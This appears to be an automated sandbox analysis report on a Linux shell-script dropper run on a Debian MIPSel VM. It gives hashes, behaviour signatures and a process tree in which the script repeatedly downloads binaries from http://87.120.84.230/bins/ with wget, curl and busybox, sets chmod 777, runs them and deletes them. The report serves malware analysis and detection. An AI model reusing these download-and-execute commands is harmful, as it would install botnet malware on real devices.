Analysis
-
max time kernel
121s -
max time network
124s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipsel image:debian9-mipsel-20240226-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
01-11-2024 03:04
Static task
static1
Behavioral task
behavioral1
Sample
3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a.sh
-
Size
10KB
-
MD5
e54d8700e6358f16715e8ef228b233b5
-
SHA1
2ca2659f90f6049ca61904ab718ac6977d98c158
-
SHA256
3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a
-
SHA512
bba349a7c47bf864182506b7566ffc31187f0172c915e774a999667b78c355711f5ef30944d0f3dd57b98f2c8aa937245bcf994b33703011343d9f85a71dfbb7
-
SSDEEP
192:W8dUisZBCCvOjsl9/7IJxxMCCvOyi/7IJxxUx:W8dJeBCCvOjslJCCvOy7O
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a.sh/tmp/3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a.sh1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:714
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵PID:719
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:727
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵PID:738
-
-
/bin/chmodchmod 777 IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7./IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵PID:746
-
-
/bin/chmodchmod 777 WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs./WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵PID:749
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵PID:750
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵PID:755
-
-
/bin/chmodchmod 777 X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame./X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- Executes dropped EXE
PID:760
-
-
/bin/rmrm X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵PID:763
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵PID:764
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:771
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵PID:780
-
-
/bin/chmodchmod 777 UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- File and Directory Permissions Modification
PID:784
-
-
/tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo./UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- Executes dropped EXE
PID:785
-
-
/bin/rmrm UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵PID:788
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵PID:790
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵PID:810
-
-
/bin/chmodchmod 777 Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l./Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵PID:815
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵PID:816
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵PID:818
-
-
/bin/chmodchmod 777 Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX./Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵PID:821
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵PID:822
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:823
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵PID:832
-
-
/bin/chmodchmod 777 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU./0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵PID:840
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵PID:841
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:848
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵PID:860
-
-
/bin/chmodchmod 777 h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb./h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵PID:863
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵PID:864
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵PID:866
-
-
/bin/chmodchmod 777 NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu./NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵PID:872
-
-
/bin/chmodchmod 777 WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt./WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵PID:875
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵PID:876
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵PID:878
-
-
/bin/chmodchmod 777 gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu./gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵PID:884
-
-
/bin/chmodchmod 777 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS./32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵PID:890
-
-
/bin/chmodchmod 777 wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM./wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵PID:896
-
-
/bin/chmodchmod 777 IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u./IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵PID:902
-
-
/bin/chmodchmod 777 Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX./Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵PID:908
-
-
/bin/chmodchmod 777 Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l./Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵PID:914
-
-
/bin/chmodchmod 777 WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt./WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵PID:917
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵PID:920
-
-
/bin/chmodchmod 777 gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu./gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵PID:926
-
-
/bin/chmodchmod 777 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU./0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵PID:930
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵PID:932
-
-
/bin/chmodchmod 777 h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb./h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵PID:938
-
-
/bin/chmodchmod 777 NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu./NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵PID:944
-
-
/bin/chmodchmod 777 IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u./IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵PID:950
-
-
/bin/chmodchmod 777 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS./32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵PID:956
-
-
/bin/chmodchmod 777 wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM./wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵PID:962
-
-
/bin/chmodchmod 777 UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo./UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵PID:968
-
-
/bin/chmodchmod 777 IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7./IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵PID:971
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵PID:972
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵PID:974
-
-
/bin/chmodchmod 777 WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs./WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵PID:977
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵PID:978
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵PID:980
-
-
/bin/chmodchmod 777 X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame./X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵PID:983
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97